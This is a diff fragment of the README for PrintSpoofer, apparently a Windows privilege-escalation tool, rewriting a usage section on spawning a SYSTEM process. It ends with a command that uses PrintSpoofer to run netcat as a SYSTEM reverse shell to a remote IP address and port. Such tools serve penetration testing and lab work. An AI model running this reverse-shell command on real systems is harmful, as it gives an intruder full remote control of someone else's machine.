itm4n/PrintSpoofer/README.md

 nt authority\system
 ```

-### Example 2: Get a SYSTEM reverse shell
+### Usage 2: Spawn a SYSTEM process and exit

-:information_source: This command can be used to create a new process and immediately exit.
+If you can __execute commands__ but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

+__Use case__: WinRM, WebShell, `wmiexec.py`, `smbexec.py`, etc.

+Create a reverse shell:

 ```txt
 C:\TOOLS>PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"